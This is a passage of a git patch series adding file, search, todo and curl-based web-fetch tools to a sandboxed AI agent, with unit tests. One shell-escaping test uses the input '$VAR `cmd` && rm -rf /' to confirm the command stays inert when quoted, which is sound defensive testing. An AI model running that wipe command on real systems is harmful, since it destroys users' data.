a/lib/agents/generalAgent/getGeneralAgent.ts +++ b/lib/agents/generalAgent/getGeneralAgent.ts @@ -1,4 +1,5 @@ -import { stepCountIs, ToolLoopAgent } from "ai"; +import { ToolLoopAgent } from "ai"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { AnthropicProviderOptions } from "@ai-sdk/anthropic"; import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google"; import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai"; @@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise Date: Thu, 21 May 2026 13:49:12 -0500 Subject: [PATCH 04/10] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20?= =?UTF-8?q?sandbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(?= =?UTF-8?q?#585)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * 
feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). 
AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- lib/agent/__tests__/buildAgentTools.test.ts | 34 +++- lib/agent/buildAgentTools.ts | 29 ++- lib/agent/tools/__tests__/bashTool.test.ts | 14 +- .../tools/__tests__/editFileTool.test.ts | 86 +++++++++ lib/agent/tools/__tests__/globTool.test.ts | 97 ++++++++++ lib/agent/tools/__tests__/grepTool.test.ts | 103 +++++++++++ .../tools/__tests__/readFileTool.test.ts | 89 ++++++++++ lib/agent/tools/__tests__/shellEscape.test.ts | 20 +++ .../tools/__tests__/toDisplayPath.test.ts | 29 +++ .../tools/__tests__/todoWriteTool.test.ts | 28 +++ .../tools/__tests__/webFetchTool.test.ts | 96 ++++++++++ .../tools/__tests__/writeFileTool.test.ts | 52 ++++++ lib/agent/tools/bashTool.ts | 109 ++++++------ lib/agent/tools/editFileTool.ts | 100 +++++++++++ lib/agent/tools/globTool.ts | 165 ++++++++++++++++++ lib/agent/tools/grepTool.ts | 143 +++++++++++++++ lib/agent/tools/readFileTool.ts | 70 ++++++++ lib/agent/tools/shellEscape.ts | 14 ++ lib/agent/tools/toDisplayPath.ts | 34 ++++ lib/agent/tools/todoWriteTool.ts | 65 +++++++ lib/agent/tools/webFetchTool.ts | 124 +++++++++++++ lib/agent/tools/writeFileTool.ts | 65 +++++++ 22 files changed, 1491 insertions(+), 75 deletions(-) create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/globTool.test.ts create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts 
create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts create mode 100644 lib/agent/tools/editFileTool.ts create mode 100644 lib/agent/tools/globTool.ts create mode 100644 lib/agent/tools/grepTool.ts create mode 100644 lib/agent/tools/readFileTool.ts create mode 100644 lib/agent/tools/shellEscape.ts create mode 100644 lib/agent/tools/toDisplayPath.ts create mode 100644 lib/agent/tools/todoWriteTool.ts create mode 100644 lib/agent/tools/webFetchTool.ts create mode 100644 lib/agent/tools/writeFileTool.ts diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 52479cad0..5478c59ca 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,17 +1,35 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +const EXPECTED_TOOL_NAMES = [ + "bash", + "read", + "write", + "edit", + "grep", + "glob", + "todo_write", + "web_fetch", +] as const; + describe("buildAgentTools", () => { - it("returns a tools record keyed by tool name", () => { + it("returns a tools record with all 8 leaf tools registered", () => { const tools = buildAgentTools(); - expect(tools).toHaveProperty("bash"); - expect(typeof tools.bash).toBe("object"); + for (const name of EXPECTED_TOOL_NAMES) { + expect(tools).toHaveProperty(name); + } }); - it("each tool has an inputSchema, description, and execute", () => { - const tools = buildAgentTools(); - expect(tools.bash.inputSchema).toBeDefined(); - expect(tools.bash.description).toBeDefined(); - expect(typeof tools.bash.execute).toBe("function"); + it("each tool exposes the AI SDK shape (description + inputSchema + execute)", 
() => { + const tools = buildAgentTools() as Record< + string, + { description?: unknown; inputSchema?: unknown; execute?: unknown } + >; + for (const name of EXPECTED_TOOL_NAMES) { + const t = tools[name]!; + expect(typeof t.description).toBe("string"); + expect(t.inputSchema).toBeDefined(); + expect(typeof t.execute).toBe("function"); + } }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index be6bde085..f9cbc2b39 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,4 +1,11 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. @@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; * at execute time — the factory takes no arguments because the tools are * stateless modulo that context. * - * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, - * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, - * `fetch`) port in follow-up PRs and slot into this record one-by-one - * without changing the factory signature. 
+ * Currently ships 8 leaf tools: + * - bash, read, write, edit, grep, glob (sandbox / file ops) + * - todo_write (planning surface; stateless, echoes the list back) + * - web_fetch (HTTP via curl inside the sandbox) + * + * Composite tools (`task` subagent, `ask_user_question` UI part, + * `skill` skill discovery) port in a follow-up PR — they require + * subagent context plumbing / UI rendering / skill discovery infra + * that isn't in api today. */ export function buildAgentTools() { return { - bash: bashTool(), + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + todo_write: todoWriteTool, + web_fetch: webFetchTool, }; } diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts index da9a999d3..568a7f72d 100644 --- a/lib/agent/tools/__tests__/bashTool.test.ts +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -34,7 +34,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = await tool.execute!({ command: "ls" }, { experimental_context: baseContext, } as never); @@ -64,7 +64,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "find ." 
}, { experimental_context: baseContext, } as never)) as { truncated?: boolean }; @@ -83,7 +83,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "ls", cwd: "apps/web" }, { experimental_context: baseContext, } as never); @@ -107,7 +107,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "curl example.com" }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); @@ -121,7 +121,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stdout: string }; @@ -134,7 +134,7 @@ describe("bashTool.execute", () => { const sandbox = makeSandbox({ execDetached: undefined }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stderr: string }; @@ -148,7 +148,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts new file mode 100644 index 000000000..3a2cac81d --- /dev/null +++ b/lib/agent/tools/__tests__/editFileTool.test.ts @@ -0,0 +1,86 @@ +import { describe, 
it, expect, vi, beforeEach } from "vitest"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(initialContent: string) { + let stored = initialContent; + return { + workingDirectory: "/sandbox/mono", + readFile: vi.fn(async () => stored), + writeFile: vi.fn(async (_path: string, content: string) => { + stored = content; + }), + getStored: () => stored, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("editFileTool", () => { + it("replaces a unique oldString once and reports the startLine", async () => { + const sb = makeSandbox("line one\nold value\nline three"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "old value", newString: "new value" }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number; startLine: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(1); + expect(result.startLine).toBe(2); + expect(sb.getStored()).toBe("line one\nnew value\nline three"); + }); + + it("rejects when oldString === newString (no-op)", async () => { + const sb = makeSandbox("anything"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/must be different/); + }); + + it("rejects when oldString is not in the file", async () => { + const sb = makeSandbox("hello world"); + 
vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "missing", newString: "other" }, + { experimental_context: ctx } as never, + )) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); + + it("rejects ambiguous edits (multiple matches without replaceAll)", async () => { + const sb = makeSandbox("foo\nfoo\nbar"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/2 times/); + }); + + it("replaces all occurrences when replaceAll:true", async () => { + const sb = makeSandbox("foo bar foo baz foo"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(3); + expect(sb.getStored()).toBe("qux bar qux baz qux"); + }); +}); diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts new file mode 100644 index 000000000..3f35d0a71 --- /dev/null +++ b/lib/agent/tools/__tests__/globTool.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, 
workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("globTool", () => { + it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => { + // Two files, newest first (sort already happens server-side in the command). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + count: number; + files: Array<{ path: string; size: number; modifiedAt: string }>; + }; + expect(result.success).toBe(true); + expect(result.count).toBe(2); + expect(result.files[0]?.path).toBe("src/index.ts"); + expect(result.files[0]?.size).toBe(512); + expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO + }); + + it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).not.toContain("-maxdepth"); + }); + + it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await 
tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never); + expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/); + }); + + it("returns success:false on non-1 exit codes", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "err", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/exit 2/); + }); +}); diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts new file mode 100644 index 000000000..e3545f501 --- /dev/null +++ b/lib/agent/tools/__tests__/grepTool.test.ts @@ -0,0 +1,103 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("grepTool", () => { + it("parses `file:line:content` output into structured matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42: login();\n/sandbox/mono/src/b.ts:7:login()", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "login", path: "src" }, { + 
experimental_context: ctx, + } as never)) as { + success: boolean; + matches: Array<{ file: string; line: number; content: string }>; + filesWithMatches: number; + }; + expect(result.success).toBe(true); + expect(result.matches).toHaveLength(3); + expect(result.matches[0]).toEqual({ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); + + it("treats exit code 1 (no matches) as success:true with empty matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 1, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "nothing", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; matchCount: number }; + expect(result.success).toBe(true); + expect(result.matchCount).toBe(0); + }); + + it("returns success:false for real grep errors (non-1 exit)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "", + stderr: "grep: invalid regex", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "[", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/invalid regex/); + }); + + it("passes -i for caseSensitive:false", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, { + experimental_context: ctx, + } as never); + 
expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i "); + }); +}); diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts new file mode 100644 index 000000000..6d1d27fa3 --- /dev/null +++ b/lib/agent/tools/__tests__/readFileTool.test.ts @@ -0,0 +1,89 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + stat: vi.fn(), + readFile: vi.fn(), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("readFileTool", () => { + it("reads a file and returns numbered lines", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "README.md" }, { + experimental_context: ctx, + } as never)) as { success: boolean; content: string; totalLines: number; path: string }; + expect(result.success).toBe(true); + expect(result.totalLines).toBe(3); + expect(result.content).toBe("1: line one\n2: line two\n3: line three"); + expect(result.path).toBe("README.md"); + }); + + it("honors offset + limit (1-indexed)", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as 
never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, { + experimental_context: ctx, + } as never)) as { content: string; startLine: number; endLine: number }; + expect(result.startLine).toBe(2); + // `endLine` is the last line included (1-indexed). With offset=2,limit=2 + // we read lines 2 + 3 of a 5-line file, so endLine=3. + expect(result.endLine).toBe(3); + expect(result.content).toBe("2: b\n3: c"); + }); + + it("rejects directories", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/directory/i); + }); + + it("returns success:false with an error string on stat/readFile failure", async () => { + const sb = makeSandbox({ + stat: vi.fn().mockRejectedValue(new Error("not found")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "missing.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); +}); diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts new file mode 100644 index 000000000..699605129 --- /dev/null +++ b/lib/agent/tools/__tests__/shellEscape.test.ts @@ -0,0 +1,20 @@ +import { describe, it, expect } from "vitest"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +describe("shellEscape", () => { + it("wraps a plain string in single quotes", () => { + expect(shellEscape("hello")).toBe("'hello'"); + }); 
+ + it("escapes embedded single quotes via the standard ' → '\\'' dance", () => { + expect(shellEscape("it's")).toBe("'it'\\''s'"); + }); + + it("handles strings with shell metacharacters unchanged inside single quotes", () => { + expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'"); + }); + + it("returns just '' for the empty string", () => { + expect(shellEscape("")).toBe("''"); + }); +}); diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts new file mode 100644 index 000000000..e862f7276 --- /dev/null +++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts @@ -0,0 +1,29 @@ +import { describe, it, expect } from "vitest"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const WORKDIR = "/sandbox/mono"; + +describe("toDisplayPath", () => { + it("strips the workingDirectory prefix when the file is inside", () => { + expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts"); + }); + + it("returns `.` for the workingDirectory itself", () => { + expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe("."); + }); + + it("keeps an absolute path when it's outside the working directory", () => { + expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts"); + }); + + it("resolves a relative input against the working directory", () => { + expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx"); + }); + + it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => { + // path.resolve on POSIX leaves backslashes inside the segment; the + // helper should still emit forward slashes for paths it keeps absolute. 
+ const result = toDisplayPath("/tmp/win\\path", WORKDIR); + expect(result.includes("\\")).toBe(false); + }); +}); diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts new file mode 100644 index 000000000..7b5d88c9e --- /dev/null +++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; + +describe("todoWriteTool", () => { + it("echoes the todos back with a count message", async () => { + const todos = [ + { id: "1", content: "ls the workspace", status: "in_progress" as const }, + { id: "2", content: "summarize what we found", status: "pending" as const }, + ]; + const result = (await todoWriteTool.execute!({ todos }, {} as never)) as { + success: boolean; + message: string; + todos: typeof todos; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 2 items"); + expect(result.todos).toEqual(todos); + }); + + it("accepts an empty list", async () => { + const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as { + success: boolean; + message: string; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 0 items"); + }); +}); diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts new file mode 100644 index 000000000..47fb75c92 --- /dev/null +++ b/lib/agent/tools/__tests__/webFetchTool.test.ts @@ -0,0 +1,96 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: 
ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("webFetchTool", () => { + it("parses body + trailing status code on success", async () => { + // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: '{"ok":true}\n200', + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, { + experimental_context: ctx, + } as never)) as { success: boolean; status: number; body: string; truncated: boolean }; + expect(result).toEqual({ + success: true, + status: 200, + body: '{"ok":true}', + truncated: false, + }); + }); + + it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 23, + stdout: "huge body fragment\n200", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, { + experimental_context: ctx, + } as never)) as { success: boolean; truncated: boolean }; + expect(result.success).toBe(true); + expect(result.truncated).toBe(true); + }); + + it("returns success:false on non-0, non-23 curl exit", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 7, + stdout: "", + stderr: "Failed to connect", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Failed to connect/); + }); + + 
it("passes the request body for POST", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "ok\n201", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + await webFetchTool.execute!( + { url: "https://example.com/api", method: "POST", body: '{"x":1}' }, + { experimental_context: ctx } as never, + ); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).toContain("-X POST"); + expect(cmd).toContain("-d '{\"x\":1}'"); + }); +}); diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts new file mode 100644 index 000000000..3656a777c --- /dev/null +++ b/lib/agent/tools/__tests__/writeFileTool.test.ts @@ -0,0 +1,52 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + mkdir: vi.fn().mockResolvedValue(undefined), + writeFile: vi.fn().mockResolvedValue(undefined), + stat: vi + .fn() + .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("writeFileTool", () => { + it("creates parent dirs and writes content via sandbox.writeFile", async () => { + const sb = makeSandbox(); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, { + 